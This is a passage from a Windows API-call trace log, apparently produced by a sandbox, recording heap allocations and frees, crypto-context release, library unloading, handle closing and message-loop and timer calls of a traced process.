hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0208.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0208.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0208.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0208.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0208.949] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0208.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.949] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0208.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0208.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0208.951] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0208.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0208.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0208.952] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0208.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0208.952] FreeLibrary (hLibModule=0x756e0000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0208.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0208.952] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0208.953] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0208.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0208.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0209.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0209.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.004] CloseHandle (hObject=0x2a0) returned 1 [0209.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0209.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0209.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0209.086] TranslateMessage (lpMsg=0x8cf708) returned 0 [0209.086] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0209.086] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0209.086] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0209.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0209.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0209.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0209.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0209.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0209.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.087] CloseHandle (hObject=0x2d0) returned 1 [0209.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0209.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0209.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee4150 | out: hHeap=0x970000) returned 1 [0209.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0209.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0209.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0209.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0209.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0209.286] 